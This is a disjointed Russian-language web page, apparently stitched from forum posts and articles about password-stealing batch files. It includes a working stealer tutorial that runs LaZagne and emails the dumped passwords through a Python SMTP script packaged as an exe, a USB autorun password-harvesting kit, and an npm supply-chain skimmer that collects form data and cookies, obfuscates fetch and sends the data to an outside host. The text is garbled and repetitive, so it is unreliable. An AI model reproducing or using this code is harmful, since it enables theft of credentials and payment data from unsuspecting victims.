+7(499)-938-42-58 Москва
+7(800)-333-37-98 Горячая линия

Батник ворующий пароли

Содержание

Батник который ворует пароли

Батник ворующий пароли

Его мы будем запускать в конце операции «тырения» паролей. И только его работу будет видеть жертва на своем экране. Я тоже значительно пострадал от всего этого и однажды решил привести список ПО и его настройки у пользователей к одному единому знаменателю.

Обсуждения 5 сообщений @echo off — скрывает тело батинка( так то она и не нужна,ну всё же) md %systemroot%\wincs — создаёт папку wincs в системной папке windows не зависимо от того на каком диске она установлена или как она названа.

md %systemdrive%\pass\ — создаёт папку pass на диске куда установлена система windows. md %systemdrive%\pass\opera\ — создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cооkies4.

dat от браузера opera (до 11* версий опера хранит свои пароли в файле wand.dat ) md %systemdrive%\pass\mozilla\ — создаёт папку mozilla куда в дальнейшем будут копироваться файлы от браузера mozilla (cооkies.sqlite,key3.db,signons.

sqlite) в которых храняться пароли.

md %systemdrive%\pass\mailagent\ — создаёт папку mailagent в которую будут копироваться файлы содержащие

Инструкция взлома — Это пособия для безопасности!

Пользовательские ссылки Пример простого bat вируса,ворующего файлы с паролями. 12011-07-08 10:59:26

  1. Администратор
  2. Зарегистрирован: 2011-07-06
  3. Сообщений: 1264
  4. Пол: Мужской
  5. Приглашений: 0
  6. Уважение: [+32/-2]
  7. MOssWar

В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик. Начнём с того что вирус будет написан на bat’e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- «командной строки».

Рекомендуем прочесть:  Юридическая помощь юао

Открываем блокнот и копируем туда следующий код: Не много распишу код самого батинка.

Взлом — для искусства

Пользовательские ссылки Воруем пароли через bat с флешки 12012-08-30 11:52:04

  1. Сообщений: 40
  2. Зарегистрирован: 2012-08-30
  3. Уважение: [+0/-0]
  4. anonim
  5. Провел на форуме:
  6. Пол: Мужской
  7. Администратор

4 часа 22 минуты

  • Последний визит: здравствуйте!

    Второй файл file.bat: Создаём 4 папки, теперь сразу понятно где что лежит(Для справки: код % d0 означает букву диска на котором лежит наш вирус)

  • www.prizrak.ws Пользовательские ссылки Пользуйтесь ссылками: Мои сообщения и Поиск по форуму — это удобно!

    >> 12008-04-30 13:21:44

    1. Приглашений: 0
    2. Skype: D_e_z_m_o_n_D
    3. шаман
    4. Уважение: +142
    5. Сообщений: 3485
    6. Откуда: ЯпониЯ
    7. Yoh
    8. Позитив: +326
    9. Пол: Мужской

    В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.

    Как украсть паролиьчерез батник

    Батник ворующий пароли

    Пример Простого Bat Вируса. В общем поржал немного и скачал эту дрянь: Уж очень захотелось вспомнить студенческие года, когда изучал вирусы.

    Но вот ссылка меня все же заинтересовала, хотя я точно знал, что это троян именно он меня и заинтересовал.

    В результате мне предложили скачать программу, которая якобы юзает недавно найденную уязвимость контакта и позволяет взломать любую учетку. Ему я сразу отписал, чтобы полечил себя да пароль сменил.

    ВИДЕО ПО ТЕМЕ: Делаем безвредный стиллер – Воруем пароли

    Дорогие читатели! Наши статьи рассказывают о типовых способах решения юридических вопросов, но каждый случай носит уникальный характер.

    Если вы хотите узнать, как решить именно Вашу проблему – обращайтесь в форму онлайн-консультанта справа или звоните по телефонам, представленным на сайте. Это быстро и бесплатно!

    • Как взломать пароли с помощью USB-накопителя
    • Bat для кражи куки
    • Bat для кражи куки
    • Батник ворующий пароли
    • Форма входа
    • Doména nenalezena
    • Копирование на флешку одного файла
    • Пример Простого Bat Вируса,ворующего Файлы С Паролями.

    Как взломать пароли с помощью USB-накопителя

    Существует множество инструментов для восстановления этих перехватчиков из их сохраненных мест. Используя эти инструменты и USB-накопитель, вы можете создать свой собственный руткит, чтобы обманывать пароли с любого компьютера.

    Нам нужны следующие инструменты для создания руткита: Восстанавливает пароли самых популярных программ Instant Messenger: Mail PassView: IE Passview: Он поддерживает новый Internet Explorer 7.

    PasswordFox – это небольшой инструмент для восстановления пароля, который позволяет вам просматривать имена пользователей и пароли, хранящиеся в браузере Mozilla Firefox.

    По умолчанию PasswordFox отображает пароли, хранящиеся в вашем текущем профиле, но вы можете легко выбрать для просмотра паролей любого другого профиля Firefox.

    Для каждой записи пароля отображается следующая информация: Индекс записи, веб-сайт, имя пользователя, пароль, поле имени пользователя и пароль.

    Подготовка USB-накопителя для взлома пароля: Ниже приведена пошаговая процедура создания инструментария для взлома пароля: Вы должны временно отключить антивирус, прежде чем выполнять следующие шагЗагрузите все 5 инструментов, извлеките их и скопируйте только исполняемые файлы файлы.

    Создайте новый блокнот и напишите в него следующий текст: Теперь скопируйте в autorun. Создайте еще один блокнот и напишите на нем следующий текст: Скопируйте в launch. Теперь ваш руткит готов, и вы все настроены на обнюхивание паролей.

    Вы можете использовать этот накопитель для пера на любом компьютере, чтобы обнюхать сохраненные пароли. Просто выполните следующие действия: Вставьте ручку-перо и всплывающее окно автоматического запуска. Это потому, что мы создали автозапуск pen-drive. Во всплывающем окне выберите первый вариант выполнить проверку вирусов.

    Теперь все инструменты восстановления пароля будут незаметно выполняться в фоновом режиме этот процесс занимает несколько секунд. Пароли сохраняются в файлах. Удалите ручку-накопитель, и вы увидите сохраненные пароли в файлах. Этот взлом работает в Windows , XP, Vista и 7.

    Эта процедура восстанавливает только сохраненные пароли если они есть на компьютере.

    Bat для кражи куки

    Решил объединить все главы в один файл. Думаю так будет немного удобней. Кроме этого буду как и раньше крепить новые главы отдельными файлами. Глава 1. Прямо на меня бежал ребенок, за которым гнались два мужика.

    Существует множество инструментов для восстановления этих перехватчиков из их сохраненных мест. Используя эти инструменты и USB-накопитель, вы можете создать свой собственный руткит, чтобы обманывать пароли с любого компьютера. Нам нужны следующие инструменты для создания руткита:

    Bat для кражи куки Называется инструмент CookiePal http: Данная программа предназначена для предупреждения пользователя при попытке Web-узла установить на машину файл cookie, при этом пользователь может разрешить или запретить это действие. Самое читаемое Подобные функции блокирования файлов cookie на сегодня есть во всех браузерах. Как сделать вирус, ворующий пароли:

    Форма входа

    AT — планирует команды и программы для выполнения на компьютере. BAT-файл из другого. CD — отображает имя или изменяет имя текущей директории.

    .

    Doména nenalezena

    .

    Возникла идейка написать BAT-файл, шобы тот при его запуске копировал cookies на флешку или на бесплатный ftp! Помогите.

    .

    Троян, ворующий пароли дистанционное управление пк not-a-virus: (заявка № 171981)

    + — Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

    + Скачайте Malwarebytes’ Anti-Malware.

    Установите (во время установки откажитесь от использования бесплатного тестового периода ), обновите базы (во время обновления откажитесь от загрузки и установки новой версии), выберите «Perform Full Scan » («Полное сканирование «), нажмите «Scan » («Сканирование «), после сканирования — Ok — Show ResultsПоказать результаты «) — Откройте лог, скопируйте в Блокнот и прикрепите его к следующему посту.
    Самостоятельно ничего не удаляйте.
    Если лог не открылся, то найти его можно в следующей папке:

    Файл требующегося лога имеет имя mbam-log-[data] (time).txt.

    например: MBAM-log-2014-10-14 (12-18-10).txt
    Если базы MBAM в автоматическом режиме обновить не удалось, обновите их отдельно.

    Загрузить обновление MBAM .

    Как написать батник

    К наиболее важным таким командам относятся:

    1. COPY — Копирует файл или файлы
    2. REM — Вставляет в программу строку с комментарием
    3. MKDIR/RMDIR — Создает и удаляет папки
    4. @ECHO OFF — Скрывает текст, обычно выводящийся на экран
    5. FOR/IN/DO — Эта команда позволяет указать файлы. [1]
    6. DEL — Удаляет файл или файлы
    7. START — Запускает файл с помощью программы установленной по умолчанию
    8. ECHO — Отображает текст на экране
    9. XCOPY — Позволяет копировать файлы с дополнительными опциями

    Пишем программу для создания папки. Одним из самых простых способов научится созданию пакетных файлов — сосредоточится на выполнении базовых задач. Например, с помощью «батника» можно быстро создать несколько папок: [2] Сохраните файл.

    После того как вы набрали код, вы можете сохранить файл с расширением .bat.

    Интернет, социальные сети, популярные сервисы, электронная почта (e-mail) и еще немного информации о web-пространстве современного мира

    Украденные данные передаются на удаленный компьютер, и, кроме того, пытается загрузить дополнительные вредоносные программы из указанных адресов HTTP.

    В завершении, троян самостоятельно удаляется из системы. Наиболее популярные приложения, из которых Win32/PSW.Fareit ворует логины и пароли пользователя:

    1. Mozilla Thunderbird
    2. Интернет Explorer
    3. Mozilla Firefox
    4. Bat! Email Client
    5. WinSCP
    6. Windows Live Mail
    7. Total Commander
    8. Opera
    9. Microsoft Outlook
    10. FileZilla
    11. Google Chrome

    Из-за удобства, многие люди сохраняют пароли в интернет-браузере или почтовом клиенте. К сожалению, удобство не всегда идет в паре с безопасностью.

    Сохраненные пароли могут быть с легкостью похищены вредоносными программами .

    Наименование вирусов

    HLLO-вирус перезаписывает данные файла-жертвы. «HLLP.» (High Level Language Parasitic) — паразитический вирус, написанный на языке программирования высокого уровня.

    HLLP-вирус поражает исполняемые файлы, не повреждая оригинальные данные файла-жертвы.

    «HLLW.» (High Level Language Worm) — вирусная программа-червь, написанная на языке программирования высокого уровня.

    Для распространения эти вирусы не нуждаются в хост-файле, а копируют себя в системные директории.

    «HLLM.» (High Level Language MassMailing Worm) — вирусные программы-черви массовой рассылки, написанные на языке программирования высокого уровня.

    Эти вирусы используют особенности форматов файлов и встроенные макро-языки приложений Microsoft Office (Word Basic для MS Word 6.0-7.0; VBA3 для MS Excel 5.0-7.0; VBA5 для MS Office’97; VBA6 для MS Office’2000)

    Приложение из каталога Google Play ворует аккаунты «ВКонтакте»

    В настоящее время эти приложения удалены из каталога. В общей сложности троян Android.PWS..3 успели загрузить не менее 12 000 пользователей. Плюс авторы вредоноса предположительно имеют собственную группу в социальной сети, в которой насчитывается более 44 600 подписчиков.

    Группа, как не трудно догадаться, в числе прочего Android.PWS..3 и предлагает пользователям установить плеер на свои устройства. Как именно злоумышленники похищают учетные данные?

    Как обычно – социальная инженерия.

    Пользователи сами сообщают свой логин и пароль малвари.

    Чтобы плеер заработал, пользователям необходимо войти в свою учетную запись, после чего учетные данные отправляются на управляющий сервер хакеров, которые могут делать с украденными аккаунтами все, что им вздумается. Специалисты замечают, что авторы Android.PWS..3 уже пытались продавать взломанные аккаунты на подпольных хакерских форумах.

    Пример трояна для кражи паролей с компьютера

    Батник ворующий пароли

    Здравствуй, читатель сегодня поговорим о том почему не надо открывать непроверенные файлы скачанные с неизвестных источников и создадим такой файл чтобы понять что он может наделать на вашем ПК. Создавать мы будем стиллер который соберет все наши пароли и отправит их нам по почте.

    Что для этого нужно?

    Нам понадобится:

    1. Python 3.x.x
    2. Инструмент для восстановления паролей(в нашем случае LaZagne)
    3. Два аккаунта Google

    И так начинаем

    Для начала поместим .exe файл инструмента LaZagne в папку с нашим проектом. Далее создадим .bat файл с любым названием(у меня будет main.bat) и файл send.py.

    У нас должна получится такая структура:

    Project:

    • laZagne.exe
    • send.py
    • main.bat

    Пишем код

    Откроем файл main.bat и поместим туда код:

    @Echo off laZagne.exe all > pass.txt

    laZagne.exe all > pass.txt

    Теперь при запуске нашего .bat файла у нас появится файл pass.txt в котором будут все ваши пароли из браузеров(и не только). Осталось только отправить данные на почту. Но как это сделать?

    Отправка на почту

    Открываем файл send.py и вставляем код:

    import smtplib import os import mimetypes from email import encoders from email.mime.base import MIMEBase from email.mime.text import MIMEText from email.mime.image import MIMEImage from email.mime.audio import MIMEAudio from email.mime.multipart import MIMEMultipart def send_email(addr_from, password, addr_to, files): msg_subj = 'Password' msg_text = 'Password' msg = MIMEMultipart() msg['From'] = addr_from msg['To'] = addr_to msg['Subject'] = msg_subj body = msg_text msg.attach(MIMEText(body, 'plain')) process_attachement(msg, files) #==========Код зависящий от сервиса========== server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit() #============================================ def process_attachement(msg, files): for f in files: if os.path.isfile(f): attach_file(msg,f) elif os.path.exists(f): dir = os.listdir(f) for file in dir: attach_file(msg,f+”/”+file) def attach_file(msg, filepath): filename = os.path.basename(filepath) ctype, encoding = mimetypes.guess_type(filepath) if ctype is None or encoding is not None: ctype = 'application/octet-stream' maintype, subtype = ctype.split('/', 1) if maintype == 'text': with open(filepath) as fp: file = MIMEText(fp.read(), _subtype=subtype) fp.close() elif maintype == 'image': with open(filepath, 'rb') as fp: file = MIMEImage(fp.read(), _subtype=subtype) fp.close() elif maintype == 'audio': with open(filepath, 'rb') as fp: file = MIMEAudio(fp.read(), _subtype=subtype) fp.close() else: with open(filepath, 'rb') as fp: file = MIMEBase(maintype, subtype) file.set_payload(fp.read()) fp.close() encoders.encode_base64(file) file.add_header('Content-Disposition', 'attachment', filename=filename) msg.attach(file) #=====Настройки================================= _from = “from@gmail.com” _password = “password” _to = “to@gmail.com” files = [“pass.txt”] #============================================= send_email(_from, _password, _to, files)

    from email import encoders                                  from email.mime.base import MIMEBase                        from email.mime.text import MIMEText                        from email.mime.image import MIMEImage                      from email.mime.audio import MIMEAudio                      from email.mime.multipart import MIMEMultipart               def send_email(addr_from, password, addr_to, files):                                 msg['Subject'] = msg_subj                                   msg.attach(MIMEText(body, 'plain'))                         process_attachement(msg, files)     #==========Код зависящий от сервиса==========    server = smtplib.SMTP('smtp.gmail.com', 587)     server.login(addr_from, password)         #============================================ def process_attachement(msg, files):                                         attach_file(msg,f+”/”+file)                 def attach_file(msg, filepath):                                 filename = os.path.basename(filepath)                       ctype, encoding = mimetypes.guess_type(filepath)            if ctype is None or encoding is not None:                      ctype = 'application/octet-stream'                      maintype, subtype = ctype.split('/', 1)                         with open(filepath) as fp:                                      file = MIMEText(fp.read(), _subtype=subtype)         elif maintype == 'image':                                       with open(filepath, 'rb') as fp:            file = MIMEImage(fp.read(), _subtype=subtype)     elif maintype == 'audio':                                       with open(filepath, 'rb') as fp:            file = MIMEAudio(fp.read(), _subtype=subtype)         with open(filepath, 'rb') as fp:            file = MIMEBase(maintype, subtype)                          file.set_payload(fp.read())                                 encoders.encode_base64(file)                        file.add_header('Content-Disposition', 'attachment', filename=filename) #=====Настройки================================= #============================================= send_email(_from, _password, _to, files)

    Теперь нужно настроить и в зависимости от сервиса по которому будете отправлять почту изменяем выделенный код: Google (прежде нужно разрешить доступ для менее безопасных приложений):

    server = smtplib.SMTP('smtp.gmail.com', 587) server.starttls() server.login(addr_from, password) server.send_message(msg) server.quit()

    server = smtplib.SMTP('smtp.gmail.com', 587) server.login(addr_from, password)

    Mail.ru:

    server = smtplib.SMTP_SSL('smtp.mail.ru', 25) server.login(addr_from, password) server.send_message(msg) server.quit()

    server = smtplib.SMTP_SSL('smtp.mail.ru', 25)server.login(addr_from, password)

    Yandex:

    server = smtplib.SMTP_SSL('smtp.yandex.ru', 465) server.login(addr_from, password) server.send_message(msg) server.quit()

    server = smtplib.SMTP_SSL('smtp.yandex.ru', 465)server.login(addr_from, password)

    Доделываем .bat

    Теперь в наш .bat файл добавим код запуска файла send.py и удаления файла pass.txt:

    send.py del /s “pass.txt”

    Сборка

    Теперь после запуска main.bat ваши пароли будут отправлены к вам на почту но если у вас не установлен Python то ничего не получится нужно превратить наш send.py файл в exe. Для этого открываем консоль и пишем:

    pip install pyinstaller pyinstaller –onefile send.py

    pyinstaller –onefile send.py

    Еще но нужно превратить main.bat файл в main.exe, и в этом нам поможет Bat To Exe Converter. Жмем на кнопку с тремя точками(«…») и ищем ваш файл main.bat, жмем «Открыть», после чего жмем «Convert» и получаем файл main.exe. Эти три файла и есть наш стиллер, можем отправлять другу и радоватьсяпроверять на работоспособность.

    Ссылки

    • Google
    • LaZagne
    • Bat To Exe Online Converter

    [Total: 6 Average: 4.7]

    Кража паролей: как наши учетные записи уводят через npm-пакет

    Батник ворующий пароли

    Кража паролей лишит вас доступа к своей странице или может оставить без кругленькой суммы – вот оно, счастье злоумышленника.

    Рассмотрим один интересный способ, как кража паролей может быть успешно реализована

    Заполучить пароль или номер кредитной карты можно многими способами. Далее речь пойдет о том, как это делается при помощи внедрения кода в npm-пакет.

    Вредоносный код, который и выполняет всю грязную работу, занимается поиском на странице браузера чего-либо из представленного ниже:

    • любая форма для ввода;
    • элемент со свойством, в названии которого встречается «password», «cardnumber», «cvc», «checkout» и т. д.

    Если после события submit искомая информация найдена, на этой страничке есть чем поживиться.

    • Из каждого поля формы извлекаем информацию: ( document.forms.forEach(…) );
    • собираем “печеньки”: document.cookie;
    • все это дело оборачивается всегда в рандомную строку: const payload = btoa(JSON.stringify(sensitiveUserData));
    • а после, отправляется на промежуточный хост: https://legit-analytics.com?q=${payload};
    • и в случае наличия полезностей – отправляется на сервер хакера.

    Перевернем мир

    Чтобы это счастье вышло в свет, нужно как-то заставить код попасть на потенциальные сайты-доноры. Можно пытаться пробиться через расширения браузеров, но это не так эффективно. Межсайтовый скриптинг – хороший вариант, но у него (у XSS) есть свои протоколы безопасности, и снова не те масштабы. Гораздо лучше подойдет npm.

    Можно изобрести пакет, который будет на лету менять цвет консольного вывода в браузере.

    Заставляем принять этот “полезный” апдейт в свои зависимости, при помощи пулл-реквеста для нескольких (любых) существующих пакетов в сети, и ждать.

    Через месяц имеем 120000 скачиваний этого обновления и выполнение кода на более чем 1000 сайтов. Конечно же, это не панацея, и велика вероятность, что эфемерное обновление пакета не примут с распростертыми объятиями, но это безопасно, и есть шанс, что быстро не засекут.

    А может, ложку дегтя?

    Звучит все гладко и красиво, но есть некоторые вопросы, которые могут появиться у пытливого читателя, и их нужно развенчать.

    Сетевые запросы от скрипта – код почти ничего не отправляет, т. е. постоянного обмена трафиком нет.

    Отсылка собранного материала происходит с 19:00 до 7:00, когда безопасники и прочие тестеры уже ничего не тестируют.

    Даже если тестировщик и захочет отличиться, код подменяет URL на “левый”, схожий с социальными сетями, и отправка происходит всегда в разное время: вот такой эффект неожиданности.

    Поиск “странностей” в npm. Удачи! Временные и ресурсные затраты несопоставимы, ну а если и найдется что-то, то в коде нет и намека на fetch, XMLHttpRequest или адрес хоста, на который все отправляется.

    const i = 'gfudi'; const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() – 1)).join(''); self[k(i)](urlWithYourPreciousData);

    “gfudi” – это fetch, но с переставленными буквами на одну, а self – это алиас window. Не используется ничего обычного, как fetch. Вместо этого, везде где можно, нужно применять EventSource(urlВашихЛюбимыхДанных). Даже если трафик буду слушать по serviceWorker-у, никто ничего не заподозрит т. к. ничего не отправляется в браузерах, которые поддерживают serviceWorker.

    Использование CSP в качестве защиты. С точки зрения CSP наш код ничего запрещенного не делает, кроме отправки данных на какой-то домен. Да, CSP неплохо справляется с XSS-атаками и может ограничивать общение браузера с внешним миром, но действия скрипта не настолько масштабны, чтобы можно было что-то проанализировать.

    const linkEl = document.createElement('link'); linkEl.rel = 'prefetch'; linkEl.href = urlWithYourPreciousData; document.head.appendChild(linkEl);

    Чтобы не поплатиться за взлом, нужно проверять CSP на наличие функционирующей системы блокировки (connect-src) и инструмент-перехватчик (default-src). Сделать это можно так:

    fetch(document.location.href) .then(resp => { const csp = resp.headers.get('Content-Security-Policy'); // Смотрим, как работает CSP });

    Проверять нужно в первый раз, чтобы пользователь, и прочие надзиратели ничего не заподозрили.

    Куда теперь бежать?

    Теперь подумаем от лица пользователя или разработчика: “Все плохо, наши пароли уже в даркнэте!”. Чтобы попытаться избежать провала, нельзя использовать npm на страницах с формами, и прочими собирающими компонентами.

    Нельзя использовать стороннюю рекламу, Google Tag Manager, скрипты с диаграммами, аналитику – никакого постороннего кода быть не должно, иначе можно получить инъекцию.

    Это касается только страниц, где пользователь что-то вводит, остальная же часть сайта может спокойно работать на React-е и не беспокоиться.

    Вам нужна отдельная страница, которая не имеет ничего лишнего и уже в ней собирать номера кредиток, пароли и учетные данные в iFrame.

    Кража паролей осуществляется и при помощи фишинга (подделывание настоящего сайта инфицированной копией). Если хакер сможет завладеть вашим почтовым ящиком, то плакали все регистрации и банковские счета, которые были привязаны к этой почте. За 2017 год было взломано 12 млн. учетных записей.

    Вполне успешным является и кейлогерство – 1 млн. пользователей пострадал, именно из-за этого вредоноса.

    Заключение

    Статья о том, что никому нельзя доверять, и оставлять сайт с известными уязвимостями строго запрещено, т. к. в мире огромное количество желающих полакомиться чем-то ценным. Любой сайт уязвим, и список этих брешей постоянно меняется: не забывайте держать руку на пульсе.

    Перевод на русский осуществлен Библиотекой Программиста.

    Оригинал статьи

    Батник ворующий пароли

    Батник ворующий пароли

    Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

    Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.

    * MessenPass — восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;

    * Mail PassView — извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;

    Так же скачаем KidoKiller для того чтобы замаскировать наши утилиты.

    Автоматическая установка софта BAT файлами

    Пожалуй каждый админ сталкивался с проблемами, связанными с различающимися версиями ПО на компах пользователей.

    У одного стоит WinXP SP1, у другого SP3, второй пользуется Firefox 2 с неработающими обновлениями, третьему в спешке забыли установить антивирус, или неправильно его настроили, у четвертого Word 2007 сохраняет файлы в формате docx, который не понимает openoffice пятого, ну и многое другое.

    Архив системного администратора

    Вопрос автоматического резервного копирования данных является едва ли не главной задачей любого системного администратора.

    И как любая задача, он может быть решен разными способами, имеющими свои положительные и отрицательные стороны.

    В любом случае важно, чтобы резервное копирование осуществлялось по определенной системе, было предсказуемым и эффективным в случае потери важных данных из-за сбоя оборудования или других обстоятельств.

    В своей практике я остановился на способе, который по ряду причин для меня наиболее удобен – я применяю батник для резервного копирования.

    Бывают ситуации, когда позарез надо добраться до информации, которая находится на чужом компьютере. А прямого доступа к компьютеру мы не имеем.

    Например, у знакомого надо стянуть текстовый файлик с паролями, который находится на рабочем столе (у меня половина знакомых хранит свои логины и пароли в блокнотике на рабочем столе.

    Там есть и пароли от почты, и от аськи, и от социальных сетей). А знакомый ни под каким предлогом не пускает Вас к компьютеру.

    Как же быть? Выход есть и очень простой! Надо написать специальный батник и закинуть его на флешку «жертве».

    Как воруют пароли от

    Обычно авторы подобного мусора пытаются убедить пользователя в том, что с его программой он сможет отправлять бесплатные подарки, смотреть гостей, читать чужую переписку, накручивать голоса и что там ещё бывает. И в итоге пользователь в место халявы теряет свои пароли.

    Предлагаю немного поковырять подобные программы. Как уже было сказано выше, в сети этого хлама очень много. При удачи можно разоблачить логово ХАКЕРА.

    Как создать BAT файл или вирус в блокноте?

    В этой статье я желаю поведать вам, как создать bat файл. редактировать и запускать его и на что он вообще способен. Все, что нам нужно это блокнот,прямые руки и немного терпения.

    Это простой текстовый файл или как говорят в народе батник, имеющий расширение .bat В этом файле прописан перечень команд и выполняется он с участием командной строки. Когда вы запускаете bat  файл, сначала происходит запуск командной строки cmd, а он в свою очередь начинает считывать все команды в файле и поочерёдно выполнять их

    В основном такие файлы используют для автоматизации рутинных процессов, например, совершать одно и тоже действие определённое количество раз (запускать или завершать любое количество программ, создавать, редактировать и удалять несколько папок за раз, массово менять имена файлов, копировать, перемещать их) и т.д.

    Компьютерные форумы

    народ, не подскажете, как в bat-файле прописать ввод пароля? суть в чем: я хочу по сети отдать команду runas, а она требует ввода пароля, причем ей по барабану, даже если пароль пустой. я это дело приписал в батник, но все равно вываливается окошко с требованием ввода пароля. как этот воод пароля прописать в батнике?

    народ, не подскажете, как в bat-файле прописать ввод пароля? суть в чем: я хочу по сети отдать команду runas, а она требует ввода пароля, причем ей по барабану, даже если пароль пустой.

    Поделиться:
    Нет комментариев

      Добавить комментарий

      Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.